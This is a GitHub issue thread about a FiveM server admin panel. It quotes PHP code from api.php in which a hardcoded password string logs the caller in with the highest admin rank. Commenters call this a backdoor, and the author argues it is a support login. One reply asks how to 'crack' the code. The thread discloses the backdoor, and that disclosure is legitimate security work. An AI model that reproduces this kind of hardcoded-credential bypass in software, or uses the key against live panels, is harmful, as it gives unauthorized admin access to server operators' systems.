### ISSUE TITLE
Backdooring much?

### ISSUE THREAD

**Issue by tabarra** [VictorMinemu/fivem-panel#1]
Pretty clear backdoor here: https://github.com/VictorMinemu/fivem-panel/blob/master/api.php#L13  
```php
function checkAPI($apipass, $nombreSV){
    if ($apipass === 'df6837d2765da2a024133c042f8b2b0ef7c4d3629c342986e6e7055fbe1e1b6c') {
        $_SESSION['Nombre']   = $nombreSV;
        $_SESSION['SteamID']  = '0';
        $_SESSION['LICENCIA'] = "0";
        $_SESSION['RANGO']    = '!API!';
        $_SESSION['lvRANGO']  = 11;
        $_SESSION['logeado']  = '1';
        return generarToken();
    } else {
        $_SESSION['logeado'] = null;
    }
}
function generarToken(){
    return hash('sha256', time() + rand());
}
```

**Comment by VictorMinemu** [comment]
Is not a "backdor", its usted to login when customer needs help 👍

**Comment by tabarra** [comment]
So.... a **backdoor**.

**Comment by MonsterZockerHD** [comment]
looks pretty clear like a backdoor. also this is open source, so why would you help „customers“?

**Comment by MonsterZockerHD** [comment]
if someone need help, he could just give you an account for it 🧐

**Comment by NonStopGamer** [comment]
"when customers need help" on a open sourced project sketchy af dude nice backdoor

**Comment by VictorMinemu** [comment]
The source is open source, the plugins to use it no

**Comment by MonsterZockerHD** [comment]
do you ever helped at least one person via this backdoor?

**Comment by nimoalr** [comment]
Yes, but everyone who came to read the source code here have also a backdoor in every community running this panel, nice.

**Comment by VictorMinemu** [comment]
Sure

**Comment by MonsterZockerHD** [comment]
why would someone need help in his panel? dude come on backdoor or not but is it one so you‘re not supporting anyone you‘re backdooring right

**Comment by nimoalr** [comment]
also i wish this domain isnt yours, you could get in trouble really quick by exposing warez like that http://poplife.es/

**Comment by VictorMinemu** [comment]
That Domain is the original domain of the server that ive creaste the panel for

**Comment by VictorMinemu** [comment]
Im net backdoring Anyone I don't care if any server uses this panel.

**Comment by VictorMinemu** [comment]
The code is public becouse the source was stealled by a devolver of poplife, and some people started to sell it to other servers. As a result my only option to stop them was to make it public here.

**Comment by VictorMinemu** [comment]
Tvis públic versión of the panel doesn't have the "back-door" activated so issue closed.

**Comment by Alaneczek123123851** [comment]
how do u cracked this code? add me TheDev#0354
